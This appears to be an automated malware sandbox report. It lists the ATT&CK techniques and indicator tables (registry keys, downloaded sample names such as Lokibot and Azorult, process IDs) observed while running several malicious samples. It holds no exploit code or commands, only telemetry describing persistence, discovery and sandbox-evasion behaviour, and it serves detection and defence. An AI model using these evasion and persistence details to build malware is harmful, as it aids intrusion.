1044	sc.exe
4952	sc.exe
4000	sc.exe
5916	sc.exe
5456	sc.exe
832	sc.exe
4056	sc.exe
1044	sc.exe
3476	sc.exe
1736	sc.exe
4148	sc.exe
2464	sc.exe
2236	sc.exe
868	sc.exe
3988	sc.exe
2952	sc.exe
5756	sc.exe
420	sc.exe
4288	sc.exe
4580	sc.exe
5408	sc.exe
2072	sc.exe
2104	sc.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 6 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File created	C:\Users\Admin\Downloads\Zika.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Lokibot.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier	firefox.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\{FA563315-C499-45CE-ADC6-EB84DB3A0AE3}\8tr.exe:Zone.Identifier	WINWORD.EXE
File created	C:\Users\Admin\Downloads\ArcticBomb.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe:Zone.Identifier	firefox.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rutserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wini.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rfusclient.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	R8.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com

Checks SCSI registry key(s) 3 TTPs 15 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 38 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	winit.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	winit.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	msedge.exe

Delays execution with timeout.exe 7 IoCs

defense_evasion

pid	Process
5212	timeout.exe
1628	timeout.exe
4344	timeout.exe
6176	timeout.exe
6632	timeout.exe
5876	timeout.exe
6536	timeout.exe

Enumerates system info in registry 2 TTPs 12 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command and Scripting Interpreter

T1059

pid	Process
6132	ipconfig.exe

Kills process with taskkill 6 IoCs

defense_evasion

pid	Process
7028	taskkill.exe
6436	taskkill.exe
2764	taskkill.exe
5360	taskkill.exe
5224	taskkill.exe
632	taskkill.exe

Modifies data under HKEY_USERS 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133871513201818831"	msedge.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	msedge.exe

Modifies registry class 46 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	winit.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	taskmgr.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1279544337-3716153908-718418795-1000\{65EE9A8E-1558-467A-BD22-51629C1962AF}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1092616257"	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupView = "0"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByDirection = "1"	NOTEPAD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	winit.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	taskmgr.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\Mode = "4"	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings	R8.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	taskmgr.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
